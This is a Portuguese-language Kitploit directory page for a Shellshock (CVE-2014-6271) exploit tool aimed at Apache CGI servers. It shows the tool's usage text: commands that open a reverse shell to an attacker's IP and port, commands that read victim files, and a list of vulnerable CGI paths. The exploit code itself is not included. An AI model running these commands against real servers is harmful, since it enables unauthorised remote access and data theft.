Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Ferramenta de Injeção Remota de Comandos Apache Shellshock para shell reverso rápido e navegação de arquivos | Kitploit
Ferramentas/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

[CVE-2014-6271] Ferramenta de Injeção Remota de Comandos Apache Shellshock para shell reverso rápido e navegação de arquivos

Ver Repositório
39há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2014-6271] Shellshock-Injeção-Remota-de-Comandos

[CVE-2014-6271] Ferramenta de Injeção Remota de Comandos Apache Shellshock para shell reverso rápido e navegação de arquivos

Exploit remoto Apache Shellshock

Uso:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variáveis:
    Vítima:
        rhost => IP da vítima
        rport => PORTA da vítima 
        
    Atacante (Para shell reverso):
        lhost => IP do atacante
        lport => PORTA do atacante para shell reverso 
    
    Echo:
        echo => Comando personalizado a injetar
        
        Exemplos:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Páginas CGI vulneráveis específicas 
            Páginas exploráveis:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix universal) Shell reverso TCP (Requer: rhost, lhost, lport)
        "files" => Ler e navegar por arquivos (Requer: rhost, echo)    
        
    Criado por Filip Studený
Baixar ferramenta